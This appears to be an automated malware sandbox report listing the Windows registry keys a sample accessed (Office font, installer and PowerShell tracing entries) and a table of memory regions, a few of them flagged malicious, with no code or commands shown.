HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 396 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
571000
heap
page read and write
 malicious
4346000
trusted library allocation
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
555000
heap
page read and write
 malicious
3A64000
heap
page read and write
7E31000
trusted library allocation
page read and write
4851000
heap
page read and write
EA000
heap
page read and write
EF000
heap
page read and write
39D000
stack
page read and write
39C0000
trusted library allocation
page read and write
8431000
trusted library allocation
page read and write
832B000
trusted library allocation
page read and write
39C2000
heap
page read and write
2F8E000
stack
page read and write
2F0000
heap
page read and write
8B0000
heap
page read and write
2F6000
stack
page read and write
2F0000
heap
page read and write
5192000
heap
page read and write
252F000
stack
page read and write
39C0000
trusted library allocation
page read and write
10000
heap
page read and write
B831000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
389C000
heap
page read and write
5F0000
trusted library allocation
page read and write
6BB000
heap
page read and write
3B80000
heap
page read and write
1F4D000
heap
page read and write
290000
heap
page read and write
45F4000
heap
page read and write
A431000
trusted library allocation
page read and write
344000
heap
page read and write
312000
stack
page read and write
497A000
heap
page read and write
39C0000
trusted library allocation
page read and write
30F000
stack
page read and write
2B7000
heap
page read and write
3EE000
stack
page read and write
10000
heap
page read and write
657000
heap
page read and write
610000
heap
page read and write
850000
heap
page read and write
2897000
trusted library allocation
page read and write
10000
heap
page read and write
39C0000
trusted library allocation
page read and write
4FB6000
heap
page read and write
36B0000
heap
page read and write
5E3000
heap
page read and write
3FD000
heap
page read and write
2AAB000
heap
page read and write
4856000
heap
page read and write
18A000
stack
page read and write
4FB8000
heap
page read and write
FC000
heap
page read and write
4DDD000
heap
page read and write
ED0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
576000
heap
page read and write
EC0000
trusted library allocation
page read and write
28A7000
trusted library allocation
page read and write
2ADF000
heap
page read and write
25C000
stack
page read and write
324F000
stack
page read and write
4DC0000
heap
page read and write
FC000
heap
page read and write
3F0000
heap
page read and write
1E0000
trusted library allocation
page read and write
40E000
heap
page read and write
3DE000
stack
page read and write
4FFE000
stack
page read and write | page guard
B40000
heap
page read and write
FC000
heap
page read and write
300000
heap
page read and write
480000
heap
page read and write
54AD000
stack
page read and write
656000
heap
page read and write
5130000
trusted library allocation
page read and write
6A0000
heap
page read and write
48B3000
heap
page read and write
B48000
heap
page read and write
2960000
trusted library allocation
page read and write
607000
heap
page read and write
20EE000
stack
page read and write
7431000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
2AAA000
heap
page read and write
270E000
stack
page read and write
39D8000
heap
page read and write
2CF0000
heap
page read and write
2B8E000
stack
page read and write
322F000
stack
page read and write
57E000
stack
page read and write | page guard
249F000
stack
page read and write
2A3C000
trusted library allocation
page read and write
31B000
stack
page read and write
39C0000
trusted library allocation
page read and write
49D1000
heap
page read and write
545000
heap
page read and write
5A3000
heap
page read and write
6E31000
trusted library allocation
page read and write
4858000
heap
page read and write
66F000
heap
page read and write
26FE000
stack
page read and write
2EE000
heap
page read and write
39C0000
trusted library allocation
page read and write
5FF000
heap
page read and write
10000
heap
page read and write
23D1000
heap
page read and write
3DE000
stack
page read and write
2A9D000
heap
page read and write
530000
trusted library allocation
page read and write
B2E000
stack
page read and write
AE31000
trusted library allocation
page read and write
B36000
heap
page read and write
310000
trusted library allocation
page read and write
3E2D000
stack
page read and write
1E2F000
stack
page read and write
2E4F000
stack
page read and write
4FA2000
heap
page read and write
1C3D000
heap
page read and write
2A00000
trusted library allocation
page read and write
4A5000
heap
page read and write
3A60000
heap
page read and write
757000
heap
page read and write
2E6E000
stack
page read and write
277F000
stack
page read and write
3641000
trusted library allocation
page read and write
596000
heap
page read and write
620000
heap
page read and write
39C0000
trusted library allocation
page read and write
2AAB000
heap
page read and write
2AAE000
stack
page read and write
5D0000
heap
page read and write
624000
heap
page read and write
790000
heap
page read and write
4D1000
heap
page read and write
4DF000
stack
page read and write
740000
heap
page read and write
1F80000
direct allocation
page read and write
208E000
stack
page read and write
4935000
heap
page read and write
39C0000
trusted library allocation
page read and write
662000
heap
page read and write
2ADF000
heap
page read and write
2A4F000
stack
page read and write
1DF000
heap
page read and write
2A80000
heap
page read and write
3A1C000
heap
page read and write
45CD000
heap
page read and write
45D000
system
page execute and read and write
317000
trusted library allocation
page read and write
470000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
2F5000
stack
page read and write
4020000
heap
page read and write
38B0000
heap
page read and write
4934000
heap
page read and write
3A84000
heap
page read and write
310000
heap
page read and write
1C90000
heap
page read and write
39C0000
trusted library allocation
page read and write
D7000
stack
page read and write
257C000
stack
page read and write
2B94000
heap
page read and write
661000
heap
page read and write
10000
heap
page read and write
37EF000
stack
page read and write
27FF000
stack
page read and write
247F000
stack
page read and write
6F8000
heap
page read and write
4BFE000
stack
page read and write
605E000
stack
page read and write
3D4B000
heap
page read and write
6BB000
heap
page read and write
3BF9000
heap
page read and write
41B000
system
page execute and read and write
857000
heap
page read and write
246B000
heap
page read and write
261E000
stack
page read and write
61CE000
stack
page read and write
39D8000
heap
page read and write
2E60000
heap
page read and write
2AC2000
heap
page read and write
2ACC000
trusted library allocation
page read and write
3A70000
heap
page read and write
6C5000
heap
page read and write
649000
heap
page read and write
48B3000
heap
page read and write
72A000
heap
page read and write
10000
heap
page read and write
2040000
heap
page read and write
52D000
stack
page read and write
4F33000
heap
page read and write
26A1000
trusted library allocation
page read and write
1F3C000
stack
page read and write
5170000
heap
page read and write
220E000
stack
page read and write
5CBE000
stack
page read and write
2B4E000
stack
page read and write
661000
heap
page read and write
380000
trusted library allocation
page execute and read and write
500000
heap
page read and write
49B6000
heap
page read and write
D0F000
heap
page read and write
9F0000
heap
page read and write
52A0000
heap
